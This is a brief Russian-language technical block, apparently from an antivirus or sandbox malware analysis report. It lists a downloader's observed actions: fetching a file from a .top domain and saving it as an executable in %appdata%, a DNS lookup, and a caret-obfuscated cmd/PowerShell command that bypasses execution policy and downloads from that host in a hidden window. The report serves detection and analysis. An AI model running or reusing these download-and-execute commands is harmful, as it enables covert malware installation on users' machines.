Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owErSh^eLl.Ex^E^ ^-exeCuT^ioNPO^lic^y^ ^BYPA^S^S^ ^-no^pRo^filE ^-WI^N^dOwST^YL^E hi^dDe^N ^(^NE^W-OBjecT sY^s^TeM^.net.^WEb^CLIe^NT).DOWn^L^oA^d^FIL^e(^'http://www.zonedop...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "p^owErSh^eLl.Ex^E^ ^-exeCuT^ioNPO^lic^y^ ^BYPA^S^S^ ^-no^pRo^filE ^-WI^N^dOwST^YL^E hi^dDe^N ^(^NE^W-OBjecT sY^s^TeM^.net.^WEb^CLIe^NT).DOWn^L^oA^d^FIL^e(^'http://www.zonedop...' (со скрытым окном)